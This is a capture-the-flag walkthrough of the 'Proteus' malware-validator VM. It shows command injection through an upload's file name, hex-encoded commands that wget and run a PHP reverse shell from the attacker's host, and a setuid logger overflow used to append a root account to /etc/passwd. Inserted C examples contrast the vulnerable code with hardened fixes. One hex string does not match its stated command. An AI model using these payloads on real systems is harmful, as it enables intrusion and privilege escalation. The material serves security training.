The objective is to get root privileges and capture the flag. Once downloaded and booted, the VM presents a login screen with no information at all apart from telling us that it is a Corporate Malware Validator:

So, heading back to our attacking machine, Kali 2017.1, I run a simple command to find the target on the local network:

    $ nmap 172.16.92.0/24

Now that we know the IP address of our target machine, let's start by scanning it to see what else we can learn:

For this case, I am using Zenmap, the GUI version of Nmap. The scan shows us that there are 2 ports open:

    Port 22 – SSH
    Port 80 – a web application

Let's browse to port 80 and see which web application we are dealing with:

On uploading a random file, I get the following message:

On uploading a file of the right type (application/x-executable and application/x-sharedlib are supported), in this case a sample C program I whipped up, I got the following:

Looking at the output, it is clear that the system is running the strings and objdump commands on the uploaded files. After some more research, I found out that '.' and '/' do not work in the file name. This made me wonder whether I could exploit it for RCE (Remote Code Execution), so I tested it with a basic Linux command. To do that, I used Burp Suite and appended the command id; to the file name I was uploading:

and forwarded the request:

Now I know that RCE works, so it is time to add a shell. I used a PHP reverse shell. However, we cannot upload the shell directly, so I converted the commands into hex and sent them the same way I sent the earlier command. I used the following format for each request:

    echo HEX_CODE | xxd -r -p

and converted the following two commands into hex:

    wget http://172.16.92.141/shell.txt -O /tmp/shell.php
    php /tmp/shell.php;

which gives:

    echo 7767657420687474703a2f2f3137322e31362e39322e3134312f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p
    echo 706870202F746D702F7368656C6C792E7068703B | xxd -r -p

I appended both commands the same way I appended the id command earlier, and after running the second one I got a reverse shell:
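The weakness behind the two steps above is that the uploaded file name reaches a shell unescaped, and blocking only '.' and '/' does nothing against ';'. The C below is an added illustration written for this writeup, not code from the Proteus VM or from the web application on it: a deliberately vulnerable handler that splices the name into a system() call, next to a hardened one that allowlists the name and execs the analyser without any shell. The upload directory and the 64-character limit are assumptions chosen for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define UPLOAD_DIR "/var/www/uploads"   /* hypothetical upload directory */

/* Vulnerable form: the user-supplied file name is spliced into a shell command.
 * A name such as "sample.elf; id" makes /bin/sh run "id" after strings, which is
 * the behaviour the upload form showed. Filtering '.' and '/' does not help. */
int analyse_unsafe(const char *filename) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "strings %s/%s", UPLOAD_DIR, filename);
    return system(cmd);
}

/* Allowlist check: letters, digits, '_', '-' and '.'; no leading dot, no "..",
 * and therefore no '/', no whitespace and no shell metacharacters such as
 * ';', '|', '$' or backticks. Returns 1 if the name is acceptable, else 0. */
int safe_filename(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.') return 0;   /* 64: example limit */
    if (strstr(name, "..") != NULL) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    return 1;
}

/* Hardened form: validate first, then run the analyser with an argument vector
 * and no shell, so the name can only ever be a path argument. Returns the tool's
 * exit status, or -1 if the name is rejected or the process could not be run. */
int analyse_safe(const char *filename) {
    if (!safe_filename(filename)) return -1;

    char path[512];
    int w = snprintf(path, sizeof path, "%s/%s", UPLOAD_DIR, filename);
    if (w < 0 || (size_t)w >= sizeof path) return -1;   /* refuse truncation */

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* "--" stops a name beginning with '-' from being read as an option */
        execlp("strings", "strings", "--", path, (char *)NULL);
        _exit(127);   /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *names[] = { "sample.elf", "sample.elf; id", "../passwd" };
    for (size_t i = 0; i < 3; i++)
        printf("%-16s -> %s\n", names[i],
               safe_filename(names[i]) ? "accepted" : "rejected");
    return 0;
}
```

The hardened version still only runs strings on files inside the upload directory; the injection the writeup used becomes impossible because the shell is never involved, and the allowlist is a second line of defence if someone later reintroduces a shell call.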

After digging around for a little while, I came across two files, admin_login_logger and admin_login_request.js. Since I did not want to go back to the web application, I started playing with the first one. After running it on my own system, I realised that it creates a new file at /var/log/proteus/log using the parameter we pass. For a long time I fed it various kinds of parameters, until I entered a long one that crashed the program. To generate it, I used pattern.py, which can be found at https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py, and ran:

    $ ./admin_login_logger `pattern.py 1024`

This crashed the program. On inspection, I saw that a file had been created in my current directory whose name was the first few characters of the string I passed, which made me wonder whether I could work out how many characters the program takes before the overflow and use that to create a user on the target machine. Running

    $ pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A

told me that the first occurrence was at position 456. Time to exploit this. To add a user, I need a password hash to put in /etc/passwd.

So, I added the following to /etc/passwd:

    Chiragh: $1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp

Time to run the exploit:

    $ ./admin_login_logger 'chiragh:$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd'

followed by:

    $ su chiragh

And we are root!
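Two things made the privilege escalation above possible: the logger copied an argument of any length into a fixed buffer, and it let the argument decide where the log file was written. The C below is an added example for this writeup, not the admin_login_logger binary from the VM (whose layout is not on the page). It reproduces the cyclic pattern that pattern.py emits, so the offset 456 reported above can be checked, and places an unsafe path builder next to a hardened one that refuses over-long names, names containing '/' and truncated results. The log directory /var/log/proteus/, the 64-character limit and the buffer sizes are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define CYCLE_LEN (26 * 26 * 10 * 3)   /* 20280 bytes before the pattern repeats */

/* Cyclic pattern in the same form as pattern.py / Metasploit's pattern_create:
 * triplets Upper+lower+digit, "Aa0Aa1...Aa9Ab0...". Returns the first `len`
 * bytes (capped at CYCLE_LEN) in a static buffer. */
const char *pattern_create(size_t len) {
    static char buf[CYCLE_LEN + 1];
    size_t n = 0;
    if (len > CYCLE_LEN) len = CYCLE_LEN;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++) buf[n++] = trip[i];
            }
    buf[n] = '\0';
    return buf;
}

/* Offset of `needle` inside the full cycle, or -1 if it does not occur. This is
 * what pattern.py computes when handed the bytes found in the crashed register. */
long pattern_offset(const char *needle) {
    const char *full = pattern_create(CYCLE_LEN);
    const char *p = strstr(full, needle);
    return p ? (long)(p - full) : -1;
}

#define LOG_DIR "/var/log/proteus/"   /* assumed join of the page's log path */
#define NAME_MAX_LEN 64                /* hypothetical limit for this example */

/* Unsafe: fixed buffer, unchecked strcpy/strcat. A name longer than the buffer
 * overruns it, which is the crash the 1024-byte pattern produced. Shown for
 * contrast only; it is never called here with a long name. */
const char *build_log_path_unsafe(const char *name) {
    static char path[128];
    strcpy(path, LOG_DIR);
    strcat(path, name);
    return path;
}

/* Hardened: bound the length, reject '/' and a leading '.', so the argument can
 * neither overflow the buffer nor steer the write outside LOG_DIR, then build
 * the path with snprintf and treat truncation as an error. NULL on rejection. */
const char *build_log_path_safe(const char *name) {
    static char path[256];
    size_t n = strlen(name);
    if (n == 0 || n > NAME_MAX_LEN) return NULL;
    if (name[0] == '.' || strchr(name, '/') != NULL) return NULL;
    int w = snprintf(path, sizeof path, LOG_DIR "%s", name);
    if (w < 0 || (size_t)w >= sizeof path) return NULL;
    return path;
}

int main(void) {
    printf("offset of Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A: %ld\n",
           pattern_offset("Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A"));
    const char *ok = build_log_path_safe("login");
    printf("safe(\"login\") -> %s\n", ok ? ok : "(rejected)");
    const char *bad = build_log_path_safe(pattern_create(456));
    printf("safe(456-byte pattern) -> %s\n", bad ? bad : "(rejected)");
    return 0;
}
```

Rejecting '/' matters independently of the overflow: even a correctly bounded logger that names its output after an untrusted argument would let a caller write into other directories, and a setuid binary doing so is the same privilege escalation by a shorter route.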

The flag is a PNG image which can be found in /root. I copied the image out by serving it from a PHP web server. The following link covers the text-to-hex conversion used above: http://www.unit-conversion.info/texttools/hexadecimal/